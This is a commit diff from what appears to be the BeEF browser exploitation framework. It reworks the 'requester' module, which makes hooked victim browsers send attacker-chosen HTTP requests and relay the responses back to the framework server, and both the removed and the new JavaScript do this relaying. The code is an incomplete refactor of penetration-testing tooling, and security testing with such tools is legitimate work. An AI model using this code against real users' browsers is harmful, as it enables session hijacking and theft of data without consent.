This is my first chop at fixing #297

It's by no means complete - but basic requests are working again.

git-svn-id: https://beef.googlecode.com/svn/trunk@811 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

lib/loader.rb

@@ -70,7 +70,6 @@ require 'lib/server/dynamichandler'
 
 require 'lib/logger'
 require 'lib/modules/command'
-require 'lib/modules/requester'
 
 require 'lib/modules/msfclient'
 require 'lib/modules/msfcommand'

lib/modules/requester.rb

@@ -1,37 +0,0 @@
-module BeEF
-module Requester
-  
-  # Setting up the proxy server for the Requester
-  class ProxyServer
-    
-    include Singleton
-    
-    def initialize
-      @config = {
-        :Port => 8080,
-        :BindAddress => '127.0.0.1',
-        :Logger => WEBrick::Log.new($stdout, WEBrick::Log::ERROR),
-        :ServerType => Thread,
-        :RequestCallback => BeEF::Requester::ProxyHttpHandler.new
-      }
-      
-      @server = WEBrick::HTTPProxyServer.new @config
-      
-      trap("INT"){@server.shutdown}
-    end
-    
-    def start
-      @server.start
-    end
-    
-  end
-  
-  # The http handler that receives requests
-  class ProxyHttpHandler
-    def call(req, res)
-      #puts req.request_line, req.raw_header
-    end
-  end
-  
-end
-end

lib/server/requesterhandler.rb

@@ -13,22 +13,18 @@ module BeEF
     #
     # Class constructor
     #
-    def initialize(config)
-      # we set up a mutex
+    def initialize(data)
       @guard = Mutex.new
+      @data = data
+      setup()
     end
     
-    #
-    # This function receives any POST http requests. We only
-    # allow the hooked browser to send back results using POST.
-    #
-    def do_POST(request, response)
+    def setup()
       # validates the hook token
-      beef_hook = request.query['BEEFHOOK'] || nil
+      beef_hook = @data['beefhook'] || nil
       raise WEBrick::HTTPStatus::BadRequest, "beef_hook is null" if beef_hook.nil?
-      
       # validates the request id
-      request_id = request.query['id'] || nil
+      request_id = @data['cid'] || nil
       raise WEBrick::HTTPStatus::BadRequest, "request_id is null" if request_id.nil?
       
       # validates that a hooked browser with the beef_hook token exists in the db
@@ -41,11 +37,12 @@ module BeEF
       
       # validates that the http request has not be ran before
       raise WEBrick::HTTPStatus::BadRequest, "This http request has been saved before" if http_db.has_ran.eql? true
-      
+  
       # validates the body
-      body = request.query['body'] || nil
-      raise WEBrick::HTTPStatus::BadRequest, "body is null" if body.nil?
       
+      body = @data['results'] || nil
+      raise WEBrick::HTTPStatus::BadRequest, "body is null" if body.nil?
+
       @guard.synchronize {
         # save the results in the database
         http_db.response = body
@@ -53,15 +50,8 @@ module BeEF
         http_db.save
       }
       
-      response.set_no_cache()
-      response.header['Content-Type'] = 'text/javascript' 
-      response.header['Access-Control-Allow-Origin'] = '*'
-      response.header['Access-Control-Allow-Methods'] = 'POST'
-      response.body = ''
     end
     
-    alias do_GET do_POST
-    
   end
   
 end

lib/ui/requester/requester.rb

@@ -50,8 +50,14 @@ class Requester < BeEF::HttpController
     host_str = req_parts[3]
     raise 'Invalid HTTP version' if not Filter.is_valid_host_str?(host_str) # check host string - Host:
     host = req_parts[4]
-    raise 'Invalid hostname' if not Filter.is_valid_hostname?(host) # check the target hostname
-
+    host_parts = host.split(/:/)
+    hostname = host_parts[0]
+    raise 'Invalid hostname' if not Filter.is_valid_hostname?(hostname) # check the target hostname
+    hostport = host_parts[1] || nil
+    if !hostport.nil?
+      raise 'Invalid hostport' if not Filter.nums_only?(hostport) # check the target hostport
+    end
+    
     # (re)build the request
     green_request = StringIO.new(verb + " " + uri + " " +  version + "\n" + host_str + " " + host)
     request = WEBrick::HTTPRequest.new(WEBrick::Config::HTTP)

modules/beefjs/net.js

@@ -48,7 +48,7 @@ beef.net = {
      */
     response: function() {
         this.status_code = null;        // 500, 404, 200, 302
-        this.body = null;               // "<html>…." if not a cross domain request
+        this.response_body = null;      // "<html>…." if not a cross domain request
         this.port_status = null;        // tcp port is open, closed or not http
         this.was_cross_domain = null;   // true or false
         this.was_timedout = null;       // the user specified timeout was reached

modules/beefjs/net/requester.js

@@ -13,42 +13,11 @@ beef.net.requester = {
 	handler: "requester",
 	
 	send: function(requests_array) {
-		var http = beef.net.get_ajax();
-		
 		for(i in requests_array) {
 			request = requests_array[i];
-			
-			// initializing the connection
-			http.open(request.method, request.uri, true);
-			
-			// setting the HTTP headers
-			for(index in request.headers) {
-				http.setRequestHeader(index, request.headers[index]);
-			}
-			
-			http.onreadystatechange = function() {
-				if (http.readyState == 4) {
-					headers = http.getAllResponseHeaders();
-					body = http.responseText;
-					
-					// sending the results back to the framework
-					beef.net.request(
-						beef.net.beef_url+'/'+beef.net.requester.handler,
-						'POST',
-						null,
-						"id="+request.id+"&body="+escape(headers+"\n\n"+body)
-					);
-				}
-			}
-			
-			if(request.method == 'POST' && request.params) {
-				http.send(request.params);
-			} else {
-				http.send(null);
-			}
+			beef.net.request('http', request.method, request.host, request.port, request.uri, null, null, 10, 'HTML', function(res) { beef.net.send('/requester', request.id, res);  });
 		}
 	}
-	
 };
 
 beef.regCmp('beef.net.requester');